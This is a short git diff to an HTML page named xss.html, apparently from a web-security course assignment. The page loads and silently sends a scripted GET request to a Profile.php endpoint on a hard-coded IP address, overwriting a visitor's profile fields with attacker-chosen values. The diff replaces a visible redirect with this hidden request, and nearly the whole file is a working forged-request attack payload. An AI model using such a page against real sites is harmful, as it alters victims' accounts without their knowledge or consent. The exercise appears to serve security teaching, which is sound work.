--- a/xss.html
+++ b/xss.html
@@ -1,7 +1,11 @@
 <!DOCTYPE html>
 <html>
 <script>
-    window.location.href="http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update"
+    var xmlHttp = null;
+
+    xmlHttp = new XMLHttpRequest();
+    xmlHttp.open( "GET", "http://67.208.233.162/XSSAssignment/Profile.php?fnameBox=HackFirstName&lnameBox=HackLdsdsdsdastName&cityBox=HackVille&submit=Update", false );
+    xmlHttp.send( null );
 </script>
 <body>
 
